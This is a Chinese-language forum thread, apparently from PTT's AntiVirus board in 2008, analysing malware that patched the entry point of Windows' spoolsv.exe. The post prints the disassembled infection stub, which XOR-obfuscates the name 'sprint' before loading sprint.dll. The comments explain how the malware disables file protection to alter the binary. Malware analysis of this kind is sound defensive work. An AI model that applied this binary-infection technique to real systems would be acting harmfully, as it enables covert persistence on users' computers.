Re: [方案] 這兩天的倒數60秒

看板AntiVirus作者 (zha0)時間15年前 (2008/09/27 15:16), 編輯推噓12(12035)
留言47則, 6人參與, 最新討論串4/7 (看更多)
bingo :) 我剛去看了一下 ... 有換掉, 改 spoolsv.exe 的 Entrypoint 進入點. 你如果二個檔案去做 diff 可以發現有多加 code :) 跟之前 FlashGet 那事件一樣 :) spoolsv.exe 被多加 Code 然後用 LoadLibrary 把 sprint.dll 起來. public start start proc near var_28= dword ptr -28h var_24= dword ptr -24h call $+5 pop eax pusha mov ecx, 53285049h push 53282427h xor [esp+24h+var_24], ecx push 3A5A203Ah xor [esp+28h+var_28], ecx ; sprint push esp add eax, 0FFFF4647h mov ebx, [eax] ; LoadLibrary call ebx pop eax pop ebx popa jmp _mainCRTStartup start endp ※ 引述《cmonkey (蝦猴)》之銘言: : spoolsv.exe的確是被改了。 : http://www.badongo.com/file/11511957 : 把兩個檔案上傳,讓高手看看。 : 另v2messem.exe被 pccilline隔離了,找不到說。 : 被清除掉的中毒檔如下: : http://www.badongo.com/file/11512031 : 這個好像是升上sp3才會中的毒? -- -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 124.8.79.216
09/27 15:22, , 1F
PS. FlashGet那個還有做SEH保謢XD 這個沒..Load不起來就Q!#%^
09/27 15:22, 1F
09/27 15:25, , 2F
所以是作者沒寫好就放上來丟臉這樣0.0?
09/27 15:25, 2F
09/27 15:26, , 3F
有寫好啊, 只是沒加 Error handler 如果 sprint LoadLibrary
09/27 15:26, 3F
09/27 15:27, , 4F
不起來會出錯 ..... 沒去考慮到 (會跳 XXXX.DLL 不能載入)
09/27 15:27, 4F
09/27 15:28, , 5F
原來是這樣...了解m(_o_)m
09/27 15:28, 5F
09/27 15:28, , 6F
是指 rpc 那個(如果是 local exploit) ... 而不是這個 XD
09/27 15:28, 6F
09/27 15:30, , 7F
可以請問為什麼spoolv.exe會被改掉嗎?OTZ是病毒嗎?
09/27 15:30, 7F
09/27 15:32, , 8F
會被改掉很簡單 ^^ 因為現在有型為分析的防毒軟体,都會監控
09/27 15:32, 8F
09/27 15:32, , 9F
registry 的一些開機自動執行的機碼 , 所以換開機中會執行
09/27 15:32, 9F
09/27 15:33, , 10F
的檔案是最快的方式 , 他先把 service 停掉,然後在把 SFP
09/27 15:33, 10F
09/27 15:33, , 11F
關掉 , 然後就去修改那個檔案,然後在開起來 XD
09/27 15:33, 11F
09/27 15:34, , 12F
如上 , 就把 sprint.dll 載入到 spoolsv 的空間去了 .
09/27 15:34, 12F
09/27 15:44, , 13F
z大 這算是DLL Injection嗎? 在記憶體裡掛上dll??
09/27 15:44, 13F
09/27 15:46, , 14F
idaer: 其實行為比較像是 virus 感染的手法 XD 但 DLL 有被
09/27 15:46, 14F
09/27 15:46, , 15F
掛起來又是真的 XD 好吧算他是 patch 檔案的 DLL Injection
09/27 15:46, 15F
09/27 15:47, , 16F
其實大多要讓 DLL 掛到 Process 的方法還滿多的 ...
09/27 15:47, 16F
09/27 15:48, , 17F
問個外行的問題 直接用svchost掛sprint.dll 行不行阿
09/27 15:48, 17F
09/27 15:49, , 18F
XD 我找到樣本了 等我3分鐘 我上傳一下 QQ
09/27 15:49, 18F
09/27 15:52, , 19F
idaer: 可以啊, 把那個 dll 寫成 service 的程式就可以了,
09/27 15:52, 19F
09/27 15:52, , 20F
你們加油假日沒環境測0rz
09/27 15:52, 20F
09/27 15:52, , 21F
但是 .... 你要去建出那 service 時有 HIPS 功能的防毒會叫
09/27 15:52, 21F
09/27 15:53, , 22F
像是灰鴿子,黑色信鴿 ... 很多 XD 就是掛成 Service 的方式
09/27 15:53, 22F
09/27 15:57, , 24F
我剛剛在虛擬機下跑了 這病毒用sandboxie跑會直接出現錯誤
09/27 15:57, 24F
09/27 15:58, , 25F
給你看 連跑都不給跑 產生的tmp 在關掉SBIE後順便一起殺掉@@
09/27 15:58, 25F
09/27 15:58, , 26F
權限沒辦法提升所以就跳錯誤我猜。
09/27 15:58, 26F
09/27 16:00, , 27F
idaer: 直接用 VMware 跑吧,VMware 用 6 的因為 5 的遇到特
09/27 16:00, 27F
09/27 16:00, , 28F
殊指令會出錯 .
09/27 16:00, 28F
09/27 16:00, , 29F
好像沒看到 exploit code 鳴 ... 還是找不到它進來的原因 .
09/27 16:00, 29F
09/27 16:01, , 30F
恩恩 逼的我只好用Hips的軟體執行它了 SSM的Hips不知道好不
09/27 16:01, 30F
09/27 16:01, , 31F
在測二個方式 1. 那些人之前已經中了, 然後壞人植入別的程式
09/27 16:01, 31F
09/27 16:02, , 32F
就是這個 v2messen.exe 然後造成 rpc 錯誤 .
09/27 16:02, 32F
09/27 16:02, , 33F
好用 我都用Virtual PC耶 VMware好像只用過一次@@
09/27 16:02, 33F
09/27 16:02, , 34F
2. 真的是用 remote exploit 打進來的 , 但 shellcode 本身就
09/27 16:02, 34F
09/27 16:02, , 35F
只是一個 downloader , 去下載這個程式下來 >____<
09/27 16:02, 35F
09/27 16:03, , 36F
如果是 remote 比較想知他用什麼弱點進來的啊 >____<
09/27 16:03, 36F
09/27 16:04, , 37F
z大 太專業了 我...我已經插不上話了 j大快點出個聲阿(指)
09/27 16:04, 37F
09/27 16:05, , 38F
先出門,有空在看 v2messen 裡面有沒什麼 exploit code > <
09/27 16:05, 38F
09/27 16:05, , 39F
這我也門外漢啊XD
09/27 16:05, 39F
09/27 16:05, , 40F
他本身 VC 在寫時,在裡面插好多 junk code XDXD
09/27 16:05, 40F
09/27 16:06, , 41F
不是是用加殼做變型,還是自己吃寶沒事插 junk code
09/27 16:06, 41F
09/27 16:06, , 42F
Z大是要找是不是這檔案靠0day來進去系統並啟動
09/27 16:06, 42F
09/27 16:13, , 43F
板上人數現在有140耶 難道大家都被(偽)疾風吸引過來了嗎XD
09/27 16:13, 43F
09/27 16:19, , 44F
對啊0rz ,系統出問題的時候才會有人來
09/27 16:19, 44F
09/27 16:48, , 45F
就像MSN版也是可以紅爆的XD
09/27 16:48, 45F
09/28 11:49, , 46F
基本上 malware 都沒在作 error handling...
09/28 11:49, 46F
09/28 11:50, , 47F
這個行為是 infect, 不算 dll injecton
09/28 11:50, 47F
更多 zha0 的文章
文章代碼(AID): #18tTterQ (AntiVirus)
討論串 (同標題文章)
本文引述了以下文章的的內容:
完整討論串 (本文為第 4 之 7 篇):
排序: 最舊先 | 最新先 | 留言數
在新視窗開啟完整討論串 (共7篇)
更多 zha0 的文章
文章代碼(AID): #18tTterQ (AntiVirus)